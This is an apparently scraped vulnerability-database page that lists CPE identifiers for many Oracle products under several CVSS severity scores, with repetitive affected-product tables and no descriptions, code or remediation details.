cpe:2.3:a:oracle:graalvm_for_jdk:21.0.1:*:*:*:*:*:*:*
|
— | |
|
sql_developer
oracle
|
cpe:2.3:a:oracle:sql_developer:21.4.2:*:*:*:*:*:*:*
|
— | |
|
goldengate
oracle
|
cpe:2.3:a:oracle:goldengate:*:*:*:*:*:*:*:*
|
— | |
|
goldengate_big_data_and_application_adapters
oracle
|
cpe:2.3:a:oracle:goldengate_big_data_and_application_adapters:*:*:*:*:*:*:*:*
|
— | |
|
goldengate_studio
oracle
|
cpe:2.3:a:oracle:goldengate_studio:12.2.0.4.0:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:graalvm_enterprise_edition20.3.12:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:graalvm_enterprise_edition21.3.8:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:graalvm_enterprise_edition22.3.4:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:17.0.9:*:*:*:*:*:*:*
|
— | |
|
sql_developer
oracle
|
cpe:2.3:a:oracle:sql_developer:22.2.0:*:*:*:*:*:*:*
|
— | |
|
sql_developer
oracle
|
cpe:2.3:a:oracle:sql_developer:23.1.0:*:*:*:*:*:*:*
|
— | |
|
secure_backup
oracle
|
cpe:2.3:a:oracle:secure_backup:*:*:*:*:*:*:*:*
|
— | |
|
spatial_and_graph
oracle
|
cpe:2.3:a:oracle:spatial_and_graph:*:*:*:*:*:*:*:*
|
— | |
|
nosql_database
oracle
|
cpe:2.3:a:oracle:nosql_database:*:*:*:*:*:*:*:*
|
— | |
|
essbase
oracle
|
cpe:2.3:a:oracle:essbase:21.5.3.0.0:*:*:*:*:*:*:*
|
— | |
|
autonomous_health_framework
oracle
|
cpe:2.3:a:oracle:autonomous_health_framework:*:*:*:*:*:*:*:*
|
— | |
|
autonomous_health_framework
oracle
|
cpe:2.3:a:oracle:autonomous_health_framework:23.10:*:*:*:*:*:*:*
|
— | |
|
spatial_and_graph
oracle
|
cpe:2.3:a:oracle:spatial_and_graph:23.3:*:*:*:*:*:*:*
|
— | |
|
sqlcl
oracle
|
cpe:2.3:a:oracle:sqlcl:*:*:*:*:*:*:*:*
|
— | |
|
goldengate_veridata
oracle
|
cpe:2.3:a:oracle:goldengate_veridata:*:*:*:*:*:*:*:*
|
— | |
|
goldengate_stream_analytics
oracle
|
cpe:2.3:a:oracle:goldengate_stream_analytics:*:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:22:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:21.0.2:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:17.0.10:*:*:*:*:*:*:*
|
— | |
|
spatial_and_graph_mapviewer
oracle
|
cpe:2.3:a:oracle:spatial_and_graph_mapviewer:*:*:*:*:*:*:*:*
|
— | |
|
essbase
oracle
|
cpe:2.3:a:oracle:essbase:21.5.4.0.0:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:graalvm_enterprise_edition20.3.13:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:graalvm_enterprise_edition21.3.9:*:*:*:*:*:*:*
|
— | |
|
fleet_patching_and_provisioning
oracle
|
cpe:2.3:a:oracle:fleet_patching_and_provisioning:23.4:*:*:*:*:*:*:*
|
— | |
|
application_express
oracle
|
cpe:2.3:a:oracle:application_express:23.2:*:*:*:*:*:*:*
|
— | |
|
essbase
oracle
|
cpe:2.3:a:oracle:essbase:21.5.6:*:*:*:*:*:*:*
|
— | |
|
management_pack_for__goldengate
oracle
|
cpe:2.3:a:oracle:management_pack_for__goldengate:12.2.1.2:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:17.0.11:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:21.0.3:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:22.0.1:*:*:*:*:*:*:*
|
— | |
|
nosql_database
oracle
|
cpe:2.3:a:oracle:nosql_database:1.4:*:*:*:*:*:*:*
|
— | |
|
nosql_database
oracle
|
cpe:2.3:a:oracle:nosql_database:1.5:*:*:*:*:*:*:*
|
— |
9.1 (Critical)
Affected products
Known affected
30 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
oracle_goldengate_stream_analytics
oracle
|
cpe:2.3:a:oracle:oracle_goldengate_stream_analytics:*:*:*:*:*:*:*:*
|
— | |
|
blockchain_platform
oracle
|
cpe:2.3:a:oracle:blockchain_platform:21.1.2:*:*:*:*:*:*:*
|
— | |
|
sql_developer
oracle
|
cpe:2.3:a:oracle:sql_developer:21.4.2:*:*:*:*:*:*:*
|
— | |
|
goldengate
oracle
|
cpe:2.3:a:oracle:goldengate:*:*:*:*:*:*:*:*
|
— | |
|
secure_backup
oracle
|
cpe:2.3:a:oracle:secure_backup:*:*:*:*:*:*:*:*
|
— | |
|
spatial_and_graph
oracle
|
cpe:2.3:a:oracle:spatial_and_graph:*:*:*:*:*:*:*:*
|
— | |
|
nosql_database
oracle
|
cpe:2.3:a:oracle:nosql_database:*:*:*:*:*:*:*:*
|
— | |
|
essbase
oracle
|
cpe:2.3:a:oracle:essbase:21.5.3.0.0:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:21.0.1:*:*:*:*:*:*:*
|
— | |
|
autonomous_health_framework
oracle
|
cpe:2.3:a:oracle:autonomous_health_framework:*:*:*:*:*:*:*:*
|
— | |
|
autonomous_health_framework
oracle
|
cpe:2.3:a:oracle:autonomous_health_framework:23.10:*:*:*:*:*:*:*
|
— | |
|
spatial_and_graph
oracle
|
cpe:2.3:a:oracle:spatial_and_graph:23.3:*:*:*:*:*:*:*
|
— | |
|
sqlcl
oracle
|
cpe:2.3:a:oracle:sqlcl:*:*:*:*:*:*:*:*
|
— | |
|
goldengate_big_data_and_application_adapters
oracle
|
cpe:2.3:a:oracle:goldengate_big_data_and_application_adapters:*:*:*:*:*:*:*:*
|
— | |
|
goldengate_studio
oracle
|
cpe:2.3:a:oracle:goldengate_studio:12.2.0.4.0:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:graalvm_enterprise_edition20.3.12:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:graalvm_enterprise_edition21.3.8:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:graalvm_enterprise_edition22.3.4:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:17.0.9:*:*:*:*:*:*:*
|
— | |
|
sql_developer
oracle
|
cpe:2.3:a:oracle:sql_developer:22.2.0:*:*:*:*:*:*:*
|
— | |
|
sql_developer
oracle
|
cpe:2.3:a:oracle:sql_developer:23.1.0:*:*:*:*:*:*:*
|
— | |
|
goldengate_veridata
oracle
|
cpe:2.3:a:oracle:goldengate_veridata:*:*:*:*:*:*:*:*
|
— | |
|
goldengate_stream_analytics
oracle
|
cpe:2.3:a:oracle:goldengate_stream_analytics:*:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:22:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:21.0.2:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:17.0.10:*:*:*:*:*:*:*
|
— | |
|
spatial_and_graph_mapviewer
oracle
|
cpe:2.3:a:oracle:spatial_and_graph_mapviewer:*:*:*:*:*:*:*:*
|
— | |
|
essbase
oracle
|
cpe:2.3:a:oracle:essbase:21.5.4.0.0:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:graalvm_enterprise_edition20.3.13:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:graalvm_enterprise_edition21.3.9:*:*:*:*:*:*:*
|
— |
7.5 (High)
Affected products
Known affected
1 product
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
blockchain_platform
oracle
|
cpe:2.3:a:oracle:blockchain_platform:21.1.2:*:*:*:*:*:*:*
|
— |
5.9 (Medium)
Affected products
Known affected
45 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
goldengate
oracle
|
cpe:2.3:a:oracle:goldengate:21.3-21.14:*:*:*:*:*:*:*
|
— | |
|
nosql_database
oracle
|
cpe:2.3:a:oracle:nosql_database:prior_to_19.5.42:*:*:*:*:*:*:*
|
— | |
|
nosql_database
oracle
|
cpe:2.3:a:oracle:nosql_database:prior_to_20.3.40:*:*:*:*:*:*:*
|
— | |
|
goldengate
oracle
|
cpe:2.3:a:oracle:goldengate:19.1.0.0.0-19.23.0.0.240716:*:*:*:*:*:*:*
|
— | |
|
nosql_database
oracle
|
cpe:2.3:a:oracle:nosql_database:prior_to_23.3.32:*:*:*:*:*:*:*
|
— | |
|
nosql_database
oracle
|
cpe:2.3:a:oracle:nosql_database:prior_to_22.3.46:*:*:*:*:*:*:*
|
— | |
|
nosql_database
oracle
|
cpe:2.3:a:oracle:nosql_database:prior_to_21.2.27:*:*:*:*:*:*:*
|
— | |
|
blockchain_platform
oracle
|
cpe:2.3:a:oracle:blockchain_platform:21.1.2:*:*:*:*:*:*:*
|
— | |
|
sql_developer
oracle
|
cpe:2.3:a:oracle:sql_developer:21.4.2:*:*:*:*:*:*:*
|
— | |
|
goldengate
oracle
|
cpe:2.3:a:oracle:goldengate:*:*:*:*:*:*:*:*
|
— | |
|
secure_backup
oracle
|
cpe:2.3:a:oracle:secure_backup:*:*:*:*:*:*:*:*
|
— | |
|
spatial_and_graph
oracle
|
cpe:2.3:a:oracle:spatial_and_graph:*:*:*:*:*:*:*:*
|
— | |
|
nosql_database
oracle
|
cpe:2.3:a:oracle:nosql_database:*:*:*:*:*:*:*:*
|
— | |
|
essbase
oracle
|
cpe:2.3:a:oracle:essbase:21.5.3.0.0:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:21.0.1:*:*:*:*:*:*:*
|
— | |
|
autonomous_health_framework
oracle
|
cpe:2.3:a:oracle:autonomous_health_framework:*:*:*:*:*:*:*:*
|
— | |
|
autonomous_health_framework
oracle
|
cpe:2.3:a:oracle:autonomous_health_framework:23.10:*:*:*:*:*:*:*
|
— | |
|
spatial_and_graph
oracle
|
cpe:2.3:a:oracle:spatial_and_graph:23.3:*:*:*:*:*:*:*
|
— | |
|
sqlcl
oracle
|
cpe:2.3:a:oracle:sqlcl:*:*:*:*:*:*:*:*
|
— | |
|
goldengate_big_data_and_application_adapters
oracle
|
cpe:2.3:a:oracle:goldengate_big_data_and_application_adapters:*:*:*:*:*:*:*:*
|
— | |
|
goldengate_studio
oracle
|
cpe:2.3:a:oracle:goldengate_studio:12.2.0.4.0:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:graalvm_enterprise_edition20.3.12:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:graalvm_enterprise_edition21.3.8:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:graalvm_enterprise_edition22.3.4:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:17.0.9:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:graalvm_enterprise_edition20.3.13:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:graalvm_enterprise_edition21.3.9:*:*:*:*:*:*:*
|
— | |
|
sql_developer
oracle
|
cpe:2.3:a:oracle:sql_developer:22.2.0:*:*:*:*:*:*:*
|
— | |
|
sql_developer
oracle
|
cpe:2.3:a:oracle:sql_developer:23.1.0:*:*:*:*:*:*:*
|
— | |
|
goldengate_veridata
oracle
|
cpe:2.3:a:oracle:goldengate_veridata:*:*:*:*:*:*:*:*
|
— | |
|
goldengate_stream_analytics
oracle
|
cpe:2.3:a:oracle:goldengate_stream_analytics:*:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:22:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:21.0.2:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:17.0.10:*:*:*:*:*:*:*
|
— | |
|
spatial_and_graph_mapviewer
oracle
|
cpe:2.3:a:oracle:spatial_and_graph_mapviewer:*:*:*:*:*:*:*:*
|
— | |
|
essbase
oracle
|
cpe:2.3:a:oracle:essbase:21.5.4.0.0:*:*:*:*:*:*:*
|
— | |
|
fleet_patching_and_provisioning
oracle
|
cpe:2.3:a:oracle:fleet_patching_and_provisioning:23.4:*:*:*:*:*:*:*
|
— | |
|
essbase
oracle
|
cpe:2.3:a:oracle:essbase:21.5.6:*:*:*:*:*:*:*
|
— | |
|
application_express
oracle
|
cpe:2.3:a:oracle:application_express:23.2:*:*:*:*:*:*:*
|
— | |
|
management_pack_for__goldengate
oracle
|
cpe:2.3:a:oracle:management_pack_for__goldengate:12.2.1.2:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:17.0.11:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:21.0.3:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:22.0.1:*:*:*:*:*:*:*
|
— | |
|
nosql_database
oracle
|
cpe:2.3:a:oracle:nosql_database:1.4:*:*:*:*:*:*:*
|
— | |
|
nosql_database
oracle
|
cpe:2.3:a:oracle:nosql_database:1.5:*:*:*:*:*:*:*
|
— |
7.5 (High)
Affected products
Known affected
26 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
blockchain_platform
oracle
|
cpe:2.3:a:oracle:blockchain_platform:21.1.2:*:*:*:*:*:*:*
|
— | |
|
goldengate
oracle
|
cpe:2.3:a:oracle:goldengate:*:*:*:*:*:*:*:*
|
— | |
|
goldengate_veridata
oracle
|
cpe:2.3:a:oracle:goldengate_veridata:*:*:*:*:*:*:*:*
|
— | |
|
goldengate_stream_analytics
oracle
|
cpe:2.3:a:oracle:goldengate_stream_analytics:*:*:*:*:*:*:*:*
|
— | |
|
autonomous_health_framework
oracle
|
cpe:2.3:a:oracle:autonomous_health_framework:*:*:*:*:*:*:*:*
|
— | |
|
sqlcl
oracle
|
cpe:2.3:a:oracle:sqlcl:*:*:*:*:*:*:*:*
|
— | |
|
goldengate_studio
oracle
|
cpe:2.3:a:oracle:goldengate_studio:12.2.0.4.0:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:22:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:21.0.2:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:17.0.10:*:*:*:*:*:*:*
|
— | |
|
spatial_and_graph_mapviewer
oracle
|
cpe:2.3:a:oracle:spatial_and_graph_mapviewer:*:*:*:*:*:*:*:*
|
— | |
|
essbase
oracle
|
cpe:2.3:a:oracle:essbase:21.5.4.0.0:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:graalvm_enterprise_edition20.3.13:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:graalvm_enterprise_edition21.3.9:*:*:*:*:*:*:*
|
— | |
|
application_express
oracle
|
cpe:2.3:a:oracle:application_express:23.2:*:*:*:*:*:*:*
|
— | |
|
fleet_patching_and_provisioning
oracle
|
cpe:2.3:a:oracle:fleet_patching_and_provisioning:23.4:*:*:*:*:*:*:*
|
— | |
|
spatial_and_graph
oracle
|
cpe:2.3:a:oracle:spatial_and_graph:*:*:*:*:*:*:*:*
|
— | |
|
essbase
oracle
|
cpe:2.3:a:oracle:essbase:21.5.6:*:*:*:*:*:*:*
|
— | |
|
management_pack_for__goldengate
oracle
|
cpe:2.3:a:oracle:management_pack_for__goldengate:12.2.1.2:*:*:*:*:*:*:*
|
— | |
|
goldengate_big_data_and_application_adapters
oracle
|
cpe:2.3:a:oracle:goldengate_big_data_and_application_adapters:*:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:17.0.11:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:21.0.3:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:22.0.1:*:*:*:*:*:*:*
|
— | |
|
nosql_database
oracle
|
cpe:2.3:a:oracle:nosql_database:1.4:*:*:*:*:*:*:*
|
— | |
|
nosql_database
oracle
|
cpe:2.3:a:oracle:nosql_database:1.5:*:*:*:*:*:*:*
|
— | |
|
nosql_database
oracle
|
cpe:2.3:a:oracle:nosql_database:*:*:*:*:*:*:*:*
|
— |
5.9 (Medium)
Affected products
Known affected
1 product
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
blockchain_platform
oracle
|
cpe:2.3:a:oracle:blockchain_platform:21.1.2:*:*:*:*:*:*:*
|
— |
6.5 (Medium)
Affected products
Known affected
1 product
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
blockchain_platform
oracle
|
cpe:2.3:a:oracle:blockchain_platform:21.1.2:*:*:*:*:*:*:*
|
— |
7.5 (High)
Affected products
Known affected
15 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
blockchain_platform
oracle
|
cpe:2.3:a:oracle:blockchain_platform:21.1.2:*:*:*:*:*:*:*
|
— | |
|
application_express
oracle
|
cpe:2.3:a:oracle:application_express:23.2:*:*:*:*:*:*:*
|
— | |
|
fleet_patching_and_provisioning
oracle
|
cpe:2.3:a:oracle:fleet_patching_and_provisioning:23.4:*:*:*:*:*:*:*
|
— | |
|
spatial_and_graph
oracle
|
cpe:2.3:a:oracle:spatial_and_graph:*:*:*:*:*:*:*:*
|
— | |
|
essbase
oracle
|
cpe:2.3:a:oracle:essbase:21.5.6:*:*:*:*:*:*:*
|
— | |
|
management_pack_for__goldengate
oracle
|
cpe:2.3:a:oracle:management_pack_for__goldengate:12.2.1.2:*:*:*:*:*:*:*
|
— | |
|
goldengate
oracle
|
cpe:2.3:a:oracle:goldengate:*:*:*:*:*:*:*:*
|
— | |
|
goldengate_big_data_and_application_adapters
oracle
|
cpe:2.3:a:oracle:goldengate_big_data_and_application_adapters:*:*:*:*:*:*:*:*
|
— | |
|
goldengate_studio
oracle
|
cpe:2.3:a:oracle:goldengate_studio:12.2.0.4.0:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:17.0.11:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:21.0.3:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:22.0.1:*:*:*:*:*:*:*
|
— | |
|
nosql_database
oracle
|
cpe:2.3:a:oracle:nosql_database:1.4:*:*:*:*:*:*:*
|
— | |
|
nosql_database
oracle
|
cpe:2.3:a:oracle:nosql_database:1.5:*:*:*:*:*:*:*
|
— | |
|
nosql_database
oracle
|
cpe:2.3:a:oracle:nosql_database:*:*:*:*:*:*:*:*
|
— |
7.5 (High)
Affected products
Known affected
15 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
blockchain_platform
oracle
|
cpe:2.3:a:oracle:blockchain_platform:21.1.2:*:*:*:*:*:*:*
|
— | |
|
application_express
oracle
|
cpe:2.3:a:oracle:application_express:23.2:*:*:*:*:*:*:*
|
— | |
|
fleet_patching_and_provisioning
oracle
|
cpe:2.3:a:oracle:fleet_patching_and_provisioning:23.4:*:*:*:*:*:*:*
|
— | |
|
spatial_and_graph
oracle
|
cpe:2.3:a:oracle:spatial_and_graph:*:*:*:*:*:*:*:*
|
— | |
|
essbase
oracle
|
cpe:2.3:a:oracle:essbase:21.5.6:*:*:*:*:*:*:*
|
— | |
|
management_pack_for__goldengate
oracle
|
cpe:2.3:a:oracle:management_pack_for__goldengate:12.2.1.2:*:*:*:*:*:*:*
|
— | |
|
goldengate
oracle
|
cpe:2.3:a:oracle:goldengate:*:*:*:*:*:*:*:*
|
— | |
|
goldengate_big_data_and_application_adapters
oracle
|
cpe:2.3:a:oracle:goldengate_big_data_and_application_adapters:*:*:*:*:*:*:*:*
|
— | |
|
goldengate_studio
oracle
|
cpe:2.3:a:oracle:goldengate_studio:12.2.0.4.0:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:17.0.11:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:21.0.3:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:22.0.1:*:*:*:*:*:*:*
|
— | |
|
nosql_database
oracle
|
cpe:2.3:a:oracle:nosql_database:1.4:*:*:*:*:*:*:*
|
— | |
|
nosql_database
oracle
|
cpe:2.3:a:oracle:nosql_database:1.5:*:*:*:*:*:*:*
|
— | |
|
nosql_database
oracle
|
cpe:2.3:a:oracle:nosql_database:*:*:*:*:*:*:*:*
|
— |
9.8 (Critical)
Affected products
Known affected
3 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
secure_backup
oracle
|
cpe:2.3:a:oracle:secure_backup:19.1.0.0.0:*:*:*:*:*:*:*
|
— | |
|
secure_backup
oracle
|
cpe:2.3:a:oracle:secure_backup:18.1.0.1.0:*:*:*:*:*:*:*
|
— | |
|
secure_backup
oracle
|
cpe:2.3:a:oracle:secure_backup:18.1.0.2.0:*:*:*:*:*:*:*
|
— |
9.8 (Critical)
Affected products
Known affected
3 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
secure_backup
oracle
|
cpe:2.3:a:oracle:secure_backup:19.1.0.0.0:*:*:*:*:*:*:*
|
— | |
|
secure_backup
oracle
|
cpe:2.3:a:oracle:secure_backup:18.1.0.1.0:*:*:*:*:*:*:*
|
— | |
|
secure_backup
oracle
|
cpe:2.3:a:oracle:secure_backup:18.1.0.2.0:*:*:*:*:*:*:*
|
— |
7.5 (High)
Affected products
Known affected
17 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
secure_backup
oracle
|
cpe:2.3:a:oracle:secure_backup:18.1.0.1.0:*:*:*:*:*:*:*
|
— | |
|
secure_backup
oracle
|
cpe:2.3:a:oracle:secure_backup:18.1.0.2.0:*:*:*:*:*:*:*
|
— | |
|
essbase
oracle
|
cpe:2.3:a:oracle:essbase:21.6:*:*:*:*:*:*:*
|
— | |
|
application_express
oracle
|
cpe:2.3:a:oracle:application_express:23.2:*:*:*:*:*:*:*
|
— | |
|
fleet_patching_and_provisioning
oracle
|
cpe:2.3:a:oracle:fleet_patching_and_provisioning:23.4:*:*:*:*:*:*:*
|
— | |
|
spatial_and_graph
oracle
|
cpe:2.3:a:oracle:spatial_and_graph:*:*:*:*:*:*:*:*
|
— | |
|
essbase
oracle
|
cpe:2.3:a:oracle:essbase:21.5.6:*:*:*:*:*:*:*
|
— | |
|
management_pack_for__goldengate
oracle
|
cpe:2.3:a:oracle:management_pack_for__goldengate:12.2.1.2:*:*:*:*:*:*:*
|
— | |
|
goldengate
oracle
|
cpe:2.3:a:oracle:goldengate:*:*:*:*:*:*:*:*
|
— | |
|
goldengate_big_data_and_application_adapters
oracle
|
cpe:2.3:a:oracle:goldengate_big_data_and_application_adapters:*:*:*:*:*:*:*:*
|
— | |
|
goldengate_studio
oracle
|
cpe:2.3:a:oracle:goldengate_studio:12.2.0.4.0:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:17.0.11:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:21.0.3:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:22.0.1:*:*:*:*:*:*:*
|
— | |
|
nosql_database
oracle
|
cpe:2.3:a:oracle:nosql_database:1.4:*:*:*:*:*:*:*
|
— | |
|
nosql_database
oracle
|
cpe:2.3:a:oracle:nosql_database:1.5:*:*:*:*:*:*:*
|
— | |
|
nosql_database
oracle
|
cpe:2.3:a:oracle:nosql_database:*:*:*:*:*:*:*:*
|
— |
9.8 (Critical)
Affected products
Known affected
3 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
secure_backup
oracle
|
cpe:2.3:a:oracle:secure_backup:19.1.0.0.0:*:*:*:*:*:*:*
|
— | |
|
secure_backup
oracle
|
cpe:2.3:a:oracle:secure_backup:18.1.0.1.0:*:*:*:*:*:*:*
|
— | |
|
secure_backup
oracle
|
cpe:2.3:a:oracle:secure_backup:18.1.0.2.0:*:*:*:*:*:*:*
|
— |
7.5 (High)
Affected products
Known affected
17 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
secure_backup
oracle
|
cpe:2.3:a:oracle:secure_backup:18.1.0.1.0:*:*:*:*:*:*:*
|
— | |
|
secure_backup
oracle
|
cpe:2.3:a:oracle:secure_backup:18.1.0.2.0:*:*:*:*:*:*:*
|
— | |
|
essbase
oracle
|
cpe:2.3:a:oracle:essbase:21.6:*:*:*:*:*:*:*
|
— | |
|
application_express
oracle
|
cpe:2.3:a:oracle:application_express:23.2:*:*:*:*:*:*:*
|
— | |
|
fleet_patching_and_provisioning
oracle
|
cpe:2.3:a:oracle:fleet_patching_and_provisioning:23.4:*:*:*:*:*:*:*
|
— | |
|
spatial_and_graph
oracle
|
cpe:2.3:a:oracle:spatial_and_graph:*:*:*:*:*:*:*:*
|
— | |
|
essbase
oracle
|
cpe:2.3:a:oracle:essbase:21.5.6:*:*:*:*:*:*:*
|
— | |
|
management_pack_for__goldengate
oracle
|
cpe:2.3:a:oracle:management_pack_for__goldengate:12.2.1.2:*:*:*:*:*:*:*
|
— | |
|
goldengate
oracle
|
cpe:2.3:a:oracle:goldengate:*:*:*:*:*:*:*:*
|
— | |
|
goldengate_big_data_and_application_adapters
oracle
|
cpe:2.3:a:oracle:goldengate_big_data_and_application_adapters:*:*:*:*:*:*:*:*
|
— | |
|
goldengate_studio
oracle
|
cpe:2.3:a:oracle:goldengate_studio:12.2.0.4.0:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:17.0.11:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:21.0.3:*:*:*:*:*:*:*
|
— | |
|
graalvm_for_jdk
oracle
|
cpe:2.3:a:oracle:graalvm_for_jdk:22.0.1:*:*:*:*:*:*:*
|
— | |
|
nosql_database
oracle
|
cpe:2.3:a:oracle:nosql_database:1.4:*:*:*:*:*:*:*
|
— | |
|
nosql_database
oracle
|
cpe:2.3:a:oracle:nosql_database:1.5:*:*:*:*:*:*:*
|
— | |
|
nosql_database
oracle
|
cpe:2.3:a:oracle:nosql_database:*:*:*:*:*:*:*:*
|
— |
7.5 (High)
Affected products
Known affected
17 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
secure_backup
oracle
|
cpe:2.3:a:oracle:secure_backup:18.1.0.1.0:*:*:*:*:*:*:*
|
— | |
|
secure_backup
oracle
|
cpe:2.3:a:oracle:secure_backup:18.1.0.2.0:*:*:*:*:*:*:*
|
— | |
|
essbase
oracle
|
cpe:2.3:a:oracle:essbase:21.6:*:*:*:*:*:*:*
|
— | |
|
application_express
oracle
|
cpe:2.3:a:oracle:application_express:23.2:*:*:*:*:*:*:*
|
— | |
|
